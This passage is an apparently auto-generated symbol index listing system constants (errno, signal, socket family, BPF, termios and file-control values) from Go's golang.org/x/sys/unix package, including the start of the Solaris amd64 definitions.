VM_MAXID (line 1598) | VM_MAXID = 0xd constant VM_MAXSLP (line 1599) | VM_MAXSLP = 0xa constant VM_METER (line 1600) | VM_METER = 0x1 constant VM_NKMEMPAGES (line 1601) | VM_NKMEMPAGES = 0x6 constant VM_PSSTRINGS (line 1602) | VM_PSSTRINGS = 0x3 constant VM_SWAPENCRYPT (line 1603) | VM_SWAPENCRYPT = 0x5 constant VM_USPACE (line 1604) | VM_USPACE = 0xb constant VM_UVMEXP (line 1605) | VM_UVMEXP = 0x4 constant VM_VNODEMIN (line 1606) | VM_VNODEMIN = 0x9 constant VM_VTEXTMIN (line 1607) | VM_VTEXTMIN = 0x8 constant VQUIT (line 1608) | VQUIT = 0x9 constant VREPRINT (line 1609) | VREPRINT = 0x6 constant VSTART (line 1610) | VSTART = 0xc constant VSTATUS (line 1611) | VSTATUS = 0x12 constant VSTOP (line 1612) | VSTOP = 0xd constant VSUSP (line 1613) | VSUSP = 0xa constant VTIME (line 1614) | VTIME = 0x11 constant VWERASE (line 1615) | VWERASE = 0x4 constant WALTSIG (line 1616) | WALTSIG = 0x4 constant WCONTINUED (line 1617) | WCONTINUED = 0x8 constant WCOREFLAG (line 1618) | WCOREFLAG = 0x80 constant WNOHANG (line 1619) | WNOHANG = 0x1 constant WUNTRACED (line 1620) | WUNTRACED = 0x2 constant XCASE (line 1621) | XCASE = 0x1000000 constant E2BIG (line 1626) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1627) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1628) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1629) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1630) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1631) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1632) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1633) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1634) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1635) | EBADMSG = syscall.Errno(0x5c) constant EBADRPC (line 1636) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1637) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1638) | ECANCELED = syscall.Errno(0x58) constant ECHILD (line 1639) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1640) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1641) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1642) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1643) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1644) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1645) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1646) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1647) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1648) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1649) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1650) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1651) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1652) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1653) | EIDRM = syscall.Errno(0x59) constant EILSEQ (line 1654) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 1655) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1656) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1657) | EINVAL = syscall.Errno(0x16) constant EIO (line 1658) | EIO = syscall.Errno(0x5) constant EIPSEC (line 1659) | EIPSEC = syscall.Errno(0x52) constant EISCONN (line 1660) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1661) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1662) | ELAST = syscall.Errno(0x5f) constant ELOOP (line 1663) | ELOOP = syscall.Errno(0x3e) constant EMEDIUMTYPE (line 1664) | EMEDIUMTYPE = syscall.Errno(0x56) constant EMFILE (line 1665) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1666) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1667) | EMSGSIZE = syscall.Errno(0x28) constant ENAMETOOLONG (line 1668) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1669) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1670) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1671) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1672) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1673) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1674) | ENOATTR = syscall.Errno(0x53) constant ENOBUFS (line 1675) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1676) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1677) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1678) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1679) | ENOLCK = syscall.Errno(0x4d) constant ENOMEDIUM (line 1680) | ENOMEDIUM = syscall.Errno(0x55) constant ENOMEM (line 1681) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1682) | ENOMSG = syscall.Errno(0x5a) constant ENOPROTOOPT (line 1683) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1684) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1685) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1686) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1687) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1688) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1689) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1690) | ENOTRECOVERABLE = syscall.Errno(0x5d) constant ENOTSOCK (line 1691) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1692) | ENOTSUP = syscall.Errno(0x5b) constant ENOTTY (line 1693) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1694) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1695) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1696) | EOVERFLOW = syscall.Errno(0x57) constant EOWNERDEAD (line 1697) | EOWNERDEAD = syscall.Errno(0x5e) constant EPERM (line 1698) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1699) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1700) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1701) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1702) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1703) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1704) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1705) | EPROTO = syscall.Errno(0x5f) constant EPROTONOSUPPORT (line 1706) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1707) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1708) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1709) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1710) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1711) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1712) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1713) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1714) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1715) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1716) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1717) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1718) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1719) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1720) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1721) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1722) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1727) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1728) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1729) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1730) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1731) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1732) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1733) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1734) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1735) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1736) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1737) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1738) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1739) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1740) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1741) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1742) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1743) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1744) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1745) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1746) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1747) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1748) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1749) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1750) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1751) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1752) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1753) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1754) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1755) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1756) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1757) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1758) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1759) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_solaris_amd64.go constant AF_802 (line 14) | AF_802 = 0x12 constant AF_APPLETALK (line 15) | AF_APPLETALK = 0x10 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_DATAKIT (line 18) | AF_DATAKIT = 0x9 constant AF_DECnet (line 19) | AF_DECnet = 0xc constant AF_DLI (line 20) | AF_DLI = 0xd constant AF_ECMA (line 21) | AF_ECMA = 0x8 constant AF_FILE (line 22) | AF_FILE = 0x1 constant AF_GOSIP (line 23) | AF_GOSIP = 0x16 constant AF_HYLINK (line 24) | AF_HYLINK = 0xf constant AF_IMPLINK (line 25) | AF_IMPLINK = 0x3 constant AF_INET (line 26) | AF_INET = 0x2 constant AF_INET6 (line 27) | AF_INET6 = 0x1a constant AF_INET_OFFLOAD (line 28) | AF_INET_OFFLOAD = 0x1e constant AF_IPX (line 29) | AF_IPX = 0x17 constant AF_KEY (line 30) | AF_KEY = 0x1b constant AF_LAT (line 31) | AF_LAT = 0xe constant AF_LINK (line 32) | AF_LINK = 0x19 constant AF_LOCAL (line 33) | AF_LOCAL = 0x1 constant AF_MAX (line 34) | AF_MAX = 0x20 constant AF_NBS (line 35) | AF_NBS = 0x7 constant AF_NCA (line 36) | AF_NCA = 0x1c constant AF_NIT (line 37) | AF_NIT = 0x11 constant AF_NS (line 38) | AF_NS = 0x6 constant AF_OSI (line 39) | AF_OSI = 0x13 constant AF_OSINET (line 40) | AF_OSINET = 0x15 constant AF_PACKET (line 41) | AF_PACKET = 0x20 constant AF_POLICY (line 42) | AF_POLICY = 0x1d constant AF_PUP (line 43) | AF_PUP = 0x4 constant AF_ROUTE (line 44) | AF_ROUTE = 0x18 constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_TRILL (line 46) | AF_TRILL = 0x1f constant AF_UNIX (line 47) | AF_UNIX = 0x1 constant AF_UNSPEC (line 48) | AF_UNSPEC = 0x0 constant AF_X25 (line 49) | AF_X25 = 0x14 constant ARPHRD_ARCNET (line 50) | ARPHRD_ARCNET = 0x7 constant ARPHRD_ATM (line 51) | ARPHRD_ATM = 0x10 constant ARPHRD_AX25 (line 52) | ARPHRD_AX25 = 0x3 constant ARPHRD_CHAOS (line 53) | ARPHRD_CHAOS = 0x5 constant ARPHRD_EETHER (line 54) | ARPHRD_EETHER = 0x2 constant ARPHRD_ETHER (line 55) | ARPHRD_ETHER = 0x1 constant ARPHRD_FC (line 56) | ARPHRD_FC = 0x12 constant ARPHRD_FRAME (line 57) | ARPHRD_FRAME = 0xf constant ARPHRD_HDLC (line 58) | ARPHRD_HDLC = 0x11 constant ARPHRD_IB (line 59) | ARPHRD_IB = 0x20 constant ARPHRD_IEEE802 (line 60) | ARPHRD_IEEE802 = 0x6 constant ARPHRD_IPATM (line 61) | ARPHRD_IPATM = 0x13 constant ARPHRD_METRICOM (line 62) | ARPHRD_METRICOM = 0x17 constant ARPHRD_TUNNEL (line 63) | ARPHRD_TUNNEL = 0x1f constant B0 (line 64) | B0 = 0x0 constant B110 (line 65) | B110 = 0x3 constant B115200 (line 66) | B115200 = 0x12 constant B1200 (line 67) | B1200 = 0x9 constant B134 (line 68) | B134 = 0x4 constant B150 (line 69) | B150 = 0x5 constant B153600 (line 70) | B153600 = 0x13 constant B1800 (line 71) | B1800 = 0xa constant B19200 (line 72) | B19200 = 0xe constant B200 (line 73) | B200 = 0x6 constant B230400 (line 74) | B230400 = 0x14 constant B2400 (line 75) | B2400 = 0xb constant B300 (line 76) | B300 = 0x7 constant B307200 (line 77) | B307200 = 0x15 constant B38400 (line 78) | B38400 = 0xf constant B460800 (line 79) | B460800 = 0x16 constant B4800 (line 80) | B4800 = 0xc constant B50 (line 81) | B50 = 0x1 constant B57600 (line 82) | B57600 = 0x10 constant B600 (line 83) | B600 = 0x8 constant B75 (line 84) | B75 = 0x2 constant B76800 (line 85) | B76800 = 0x11 constant B921600 (line 86) | B921600 = 0x17 constant B9600 (line 87) | B9600 = 0xd constant BIOCFLUSH (line 88) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 89) | BIOCGBLEN = 0x40044266 constant BIOCGDLT (line 90) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 91) | BIOCGDLTLIST = -0x3fefbd89 constant BIOCGDLTLIST32 (line 92) | BIOCGDLTLIST32 = -0x3ff7bd89 constant BIOCGETIF (line 93) | BIOCGETIF = 0x4020426b constant BIOCGETLIF (line 94) | BIOCGETLIF = 0x4078426b constant BIOCGHDRCMPLT (line 95) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRTIMEOUT (line 96) | BIOCGRTIMEOUT = 0x4010427b constant BIOCGRTIMEOUT32 (line 97) | BIOCGRTIMEOUT32 = 0x4008427b constant BIOCGSEESENT (line 98) | BIOCGSEESENT = 0x40044278 constant BIOCGSTATS (line 99) | BIOCGSTATS = 0x4080426f constant BIOCGSTATSOLD (line 100) | BIOCGSTATSOLD = 0x4008426f constant BIOCIMMEDIATE (line 101) | BIOCIMMEDIATE = -0x7ffbbd90 constant BIOCPROMISC (line 102) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 103) | BIOCSBLEN = -0x3ffbbd9a constant BIOCSDLT (line 104) | BIOCSDLT = -0x7ffbbd8a constant BIOCSETF (line 105) | BIOCSETF = -0x7fefbd99 constant BIOCSETF32 (line 106) | BIOCSETF32 = -0x7ff7bd99 constant BIOCSETIF (line 107) | BIOCSETIF = -0x7fdfbd94 constant BIOCSETLIF (line 108) | BIOCSETLIF = -0x7f87bd94 constant BIOCSHDRCMPLT (line 109) | BIOCSHDRCMPLT = -0x7ffbbd8b constant BIOCSRTIMEOUT (line 110) | BIOCSRTIMEOUT = -0x7fefbd86 constant BIOCSRTIMEOUT32 (line 111) | BIOCSRTIMEOUT32 = -0x7ff7bd86 constant BIOCSSEESENT (line 112) | BIOCSSEESENT = -0x7ffbbd87 constant BIOCSTCPF (line 113) | BIOCSTCPF = -0x7fefbd8e constant BIOCSUDPF (line 114) | BIOCSUDPF = -0x7fefbd8d constant BIOCVERSION (line 115) | BIOCVERSION = 0x40044271 constant BPF_A (line 116) | BPF_A = 0x10 constant BPF_ABS (line 117) | BPF_ABS = 0x20 constant BPF_ADD (line 118) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 119) | BPF_ALIGNMENT = 0x4 constant BPF_ALU (line 120) | BPF_ALU = 0x4 constant BPF_AND (line 121) | BPF_AND = 0x50 constant BPF_B (line 122) | BPF_B = 0x10 constant BPF_DFLTBUFSIZE (line 123) | BPF_DFLTBUFSIZE = 0x100000 constant BPF_DIV (line 124) | BPF_DIV = 0x30 constant BPF_H (line 125) | BPF_H = 0x8 constant BPF_IMM (line 126) | BPF_IMM = 0x0 constant BPF_IND (line 127) | BPF_IND = 0x40 constant BPF_JA (line 128) | BPF_JA = 0x0 constant BPF_JEQ (line 129) | BPF_JEQ = 0x10 constant BPF_JGE (line 130) | BPF_JGE = 0x30 constant BPF_JGT (line 131) | BPF_JGT = 0x20 constant BPF_JMP (line 132) | BPF_JMP = 0x5 constant BPF_JSET (line 133) | BPF_JSET = 0x40 constant BPF_K (line 134) | BPF_K = 0x0 constant BPF_LD (line 135) | BPF_LD = 0x0 constant BPF_LDX (line 136) | BPF_LDX = 0x1 constant BPF_LEN (line 137) | BPF_LEN = 0x80 constant BPF_LSH (line 138) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 139) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 140) | BPF_MAXBUFSIZE = 0x1000000 constant BPF_MAXINSNS (line 141) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 142) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 143) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 144) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 145) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 146) | BPF_MISC = 0x7 constant BPF_MSH (line 147) | BPF_MSH = 0xa0 constant BPF_MUL (line 148) | BPF_MUL = 0x20 constant BPF_NEG (line 149) | BPF_NEG = 0x80 constant BPF_OR (line 150) | BPF_OR = 0x40 constant BPF_RELEASE (line 151) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 152) | BPF_RET = 0x6 constant BPF_RSH (line 153) | BPF_RSH = 0x70 constant BPF_ST (line 154) | BPF_ST = 0x2 constant BPF_STX (line 155) | BPF_STX = 0x3 constant BPF_SUB (line 156) | BPF_SUB = 0x10 constant BPF_TAX (line 157) | BPF_TAX = 0x0 constant BPF_TXA (line 158) | BPF_TXA = 0x80 constant BPF_W (line 159) | BPF_W = 0x0 constant BPF_X (line 160) | BPF_X = 0x8 constant BRKINT (line 161) | BRKINT = 0x2 constant BS0 (line 162) | BS0 = 0x0 constant BS1 (line 163) | BS1 = 0x2000 constant BSDLY (line 164) | BSDLY = 0x2000 constant CBAUD (line 165) | CBAUD = 0xf constant CFLUSH (line 166) | CFLUSH = 0xf constant CIBAUD (line 167) | CIBAUD = 0xf0000 constant CLOCAL (line 168) | CLOCAL = 0x800 constant CLOCK_HIGHRES (line 169) | CLOCK_HIGHRES = 0x4 constant CLOCK_LEVEL (line 170) | CLOCK_LEVEL = 0xa constant CLOCK_MONOTONIC (line 171) | CLOCK_MONOTONIC = 0x4 constant CLOCK_PROCESS_CPUTIME_ID (line 172) | CLOCK_PROCESS_CPUTIME_ID = 0x5 constant CLOCK_PROF (line 173) | CLOCK_PROF = 0x2 constant CLOCK_REALTIME (line 174) | CLOCK_REALTIME = 0x3 constant CLOCK_THREAD_CPUTIME_ID (line 175) | CLOCK_THREAD_CPUTIME_ID = 0x2 constant CLOCK_VIRTUAL (line 176) | CLOCK_VIRTUAL = 0x1 constant CR0 (line 177) | CR0 = 0x0 constant CR1 (line 178) | CR1 = 0x200 constant CR2 (line 179) | CR2 = 0x400 constant CR3 (line 180) | CR3 = 0x600 constant CRDLY (line 181) | CRDLY = 0x600 constant CREAD (line 182) | CREAD = 0x80 constant CRTSCTS (line 183) | CRTSCTS = 0x80000000 constant CS5 (line 184) | CS5 = 0x0 constant CS6 (line 185) | CS6 = 0x10 constant CS7 (line 186) | CS7 = 0x20 constant CS8 (line 187) | CS8 = 0x30 constant CSIZE (line 188) | CSIZE = 0x30 constant CSTART (line 189) | CSTART = 0x11 constant CSTATUS (line 190) | CSTATUS = 0x14 constant CSTOP (line 191) | CSTOP = 0x13 constant CSTOPB (line 192) | CSTOPB = 0x40 constant CSUSP (line 193) | CSUSP = 0x1a constant CSWTCH (line 194) | CSWTCH = 0x1a constant DIOC (line 195) | DIOC = 0x6400 constant DIOCGETB (line 196) | DIOCGETB = 0x6402 constant DIOCGETC (line 197) | DIOCGETC = 0x6401 constant DIOCGETP (line 198) | DIOCGETP = 0x6408 constant DIOCSETE (line 199) | DIOCSETE = 0x6403 constant DIOCSETP (line 200) | DIOCSETP = 0x6409 constant DLT_AIRONET_HEADER (line 201) | DLT_AIRONET_HEADER = 0x78 constant DLT_APPLE_IP_OVER_IEEE1394 (line 202) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 203) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 204) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 205) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 206) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 207) | DLT_AURORA = 0x7e constant DLT_AX25 (line 208) | DLT_AX25 = 0x3 constant DLT_BACNET_MS_TP (line 209) | DLT_BACNET_MS_TP = 0xa5 constant DLT_CHAOS (line 210) | DLT_CHAOS = 0x5 constant DLT_CISCO_IOS (line 211) | DLT_CISCO_IOS = 0x76 constant DLT_C_HDLC (line 212) | DLT_C_HDLC = 0x68 constant DLT_DOCSIS (line 213) | DLT_DOCSIS = 0x8f constant DLT_ECONET (line 214) | DLT_ECONET = 0x73 constant DLT_EN10MB (line 215) | DLT_EN10MB = 0x1 constant DLT_EN3MB (line 216) | DLT_EN3MB = 0x2 constant DLT_ENC (line 217) | DLT_ENC = 0x6d constant DLT_ERF_ETH (line 218) | DLT_ERF_ETH = 0xaf constant DLT_ERF_POS (line 219) | DLT_ERF_POS = 0xb0 constant DLT_FDDI (line 220) | DLT_FDDI = 0xa constant DLT_FRELAY (line 221) | DLT_FRELAY = 0x6b constant DLT_GCOM_SERIAL (line 222) | DLT_GCOM_SERIAL = 0xad constant DLT_GCOM_T1E1 (line 223) | DLT_GCOM_T1E1 = 0xac constant DLT_GPF_F (line 224) | DLT_GPF_F = 0xab constant DLT_GPF_T (line 225) | DLT_GPF_T = 0xaa constant DLT_GPRS_LLC (line 226) | DLT_GPRS_LLC = 0xa9 constant DLT_HDLC (line 227) | DLT_HDLC = 0x10 constant DLT_HHDLC (line 228) | DLT_HHDLC = 0x79 constant DLT_HIPPI (line 229) | DLT_HIPPI = 0xf constant DLT_IBM_SN (line 230) | DLT_IBM_SN = 0x92 constant DLT_IBM_SP (line 231) | DLT_IBM_SP = 0x91 constant DLT_IEEE802 (line 232) | DLT_IEEE802 = 0x6 constant DLT_IEEE802_11 (line 233) | DLT_IEEE802_11 = 0x69 constant DLT_IEEE802_11_RADIO (line 234) | DLT_IEEE802_11_RADIO = 0x7f constant DLT_IEEE802_11_RADIO_AVS (line 235) | DLT_IEEE802_11_RADIO_AVS = 0xa3 constant DLT_IPNET (line 236) | DLT_IPNET = 0xe2 constant DLT_IPOIB (line 237) | DLT_IPOIB = 0xa2 constant DLT_IP_OVER_FC (line 238) | DLT_IP_OVER_FC = 0x7a constant DLT_JUNIPER_ATM1 (line 239) | DLT_JUNIPER_ATM1 = 0x89 constant DLT_JUNIPER_ATM2 (line 240) | DLT_JUNIPER_ATM2 = 0x87 constant DLT_JUNIPER_CHDLC (line 241) | DLT_JUNIPER_CHDLC = 0xb5 constant DLT_JUNIPER_ES (line 242) | DLT_JUNIPER_ES = 0x84 constant DLT_JUNIPER_ETHER (line 243) | DLT_JUNIPER_ETHER = 0xb2 constant DLT_JUNIPER_FRELAY (line 244) | DLT_JUNIPER_FRELAY = 0xb4 constant DLT_JUNIPER_GGSN (line 245) | DLT_JUNIPER_GGSN = 0x85 constant DLT_JUNIPER_MFR (line 246) | DLT_JUNIPER_MFR = 0x86 constant DLT_JUNIPER_MLFR (line 247) | DLT_JUNIPER_MLFR = 0x83 constant DLT_JUNIPER_MLPPP (line 248) | DLT_JUNIPER_MLPPP = 0x82 constant DLT_JUNIPER_MONITOR (line 249) | DLT_JUNIPER_MONITOR = 0xa4 constant DLT_JUNIPER_PIC_PEER (line 250) | DLT_JUNIPER_PIC_PEER = 0xae constant DLT_JUNIPER_PPP (line 251) | DLT_JUNIPER_PPP = 0xb3 constant DLT_JUNIPER_PPPOE (line 252) | DLT_JUNIPER_PPPOE = 0xa7 constant DLT_JUNIPER_PPPOE_ATM (line 253) | DLT_JUNIPER_PPPOE_ATM = 0xa8 constant DLT_JUNIPER_SERVICES (line 254) | DLT_JUNIPER_SERVICES = 0x88 constant DLT_LINUX_IRDA (line 255) | DLT_LINUX_IRDA = 0x90 constant DLT_LINUX_LAPD (line 256) | DLT_LINUX_LAPD = 0xb1 constant DLT_LINUX_SLL (line 257) | DLT_LINUX_SLL = 0x71 constant DLT_LOOP (line 258) | DLT_LOOP = 0x6c constant DLT_LTALK (line 259) | DLT_LTALK = 0x72 constant DLT_MTP2 (line 260) | DLT_MTP2 = 0x8c constant DLT_MTP2_WITH_PHDR (line 261) | DLT_MTP2_WITH_PHDR = 0x8b constant DLT_MTP3 (line 262) | DLT_MTP3 = 0x8d constant DLT_NULL (line 263) | DLT_NULL = 0x0 constant DLT_PCI_EXP (line 264) | DLT_PCI_EXP = 0x7d constant DLT_PFLOG (line 265) | DLT_PFLOG = 0x75 constant DLT_PFSYNC (line 266) | DLT_PFSYNC = 0x12 constant DLT_PPP (line 267) | DLT_PPP = 0x9 constant DLT_PPP_BSDOS (line 268) | DLT_PPP_BSDOS = 0xe constant DLT_PPP_PPPD (line 269) | DLT_PPP_PPPD = 0xa6 constant DLT_PRISM_HEADER (line 270) | DLT_PRISM_HEADER = 0x77 constant DLT_PRONET (line 271) | DLT_PRONET = 0x4 constant DLT_RAW (line 272) | DLT_RAW = 0xc constant DLT_RAWAF_MASK (line 273) | DLT_RAWAF_MASK = 0x2240000 constant DLT_RIO (line 274) | DLT_RIO = 0x7c constant DLT_SCCP (line 275) | DLT_SCCP = 0x8e constant DLT_SLIP (line 276) | DLT_SLIP = 0x8 constant DLT_SLIP_BSDOS (line 277) | DLT_SLIP_BSDOS = 0xd constant DLT_SUNATM (line 278) | DLT_SUNATM = 0x7b constant DLT_SYMANTEC_FIREWALL (line 279) | DLT_SYMANTEC_FIREWALL = 0x63 constant DLT_TZSP (line 280) | DLT_TZSP = 0x80 constant ECHO (line 281) | ECHO = 0x8 constant ECHOCTL (line 282) | ECHOCTL = 0x200 constant ECHOE (line 283) | ECHOE = 0x10 constant ECHOK (line 284) | ECHOK = 0x20 constant ECHOKE (line 285) | ECHOKE = 0x800 constant ECHONL (line 286) | ECHONL = 0x40 constant ECHOPRT (line 287) | ECHOPRT = 0x400 constant EMPTY_SET (line 288) | EMPTY_SET = 0x0 constant EMT_CPCOVF (line 289) | EMT_CPCOVF = 0x1 constant EQUALITY_CHECK (line 290) | EQUALITY_CHECK = 0x0 constant EXTA (line 291) | EXTA = 0xe constant EXTB (line 292) | EXTB = 0xf constant FD_CLOEXEC (line 293) | FD_CLOEXEC = 0x1 constant FD_NFDBITS (line 294) | FD_NFDBITS = 0x40 constant FD_SETSIZE (line 295) | FD_SETSIZE = 0x10000 constant FF0 (line 296) | FF0 = 0x0 constant FF1 (line 297) | FF1 = 0x8000 constant FFDLY (line 298) | FFDLY = 0x8000 constant FIORDCHK (line 299) | FIORDCHK = 0x6603 constant FLUSHALL (line 300) | FLUSHALL = 0x1 constant FLUSHDATA (line 301) | FLUSHDATA = 0x0 constant FLUSHO (line 302) | FLUSHO = 0x2000 constant F_ALLOCSP (line 303) | F_ALLOCSP = 0xa constant F_ALLOCSP64 (line 304) | F_ALLOCSP64 = 0xa constant F_BADFD (line 305) | F_BADFD = 0x2e constant F_BLKSIZE (line 306) | F_BLKSIZE = 0x13 constant F_BLOCKS (line 307) | F_BLOCKS = 0x12 constant F_CHKFL (line 308) | F_CHKFL = 0x8 constant F_COMPAT (line 309) | F_COMPAT = 0x8 constant F_DUP2FD (line 310) | F_DUP2FD = 0x9 constant F_DUP2FD_CLOEXEC (line 311) | F_DUP2FD_CLOEXEC = 0x24 constant F_DUPFD (line 312) | F_DUPFD = 0x0 constant F_DUPFD_CLOEXEC (line 313) | F_DUPFD_CLOEXEC = 0x25 constant F_FLOCK (line 314) | F_FLOCK = 0x35 constant F_FLOCK64 (line 315) | F_FLOCK64 = 0x35 constant F_FLOCKW (line 316) | F_FLOCKW 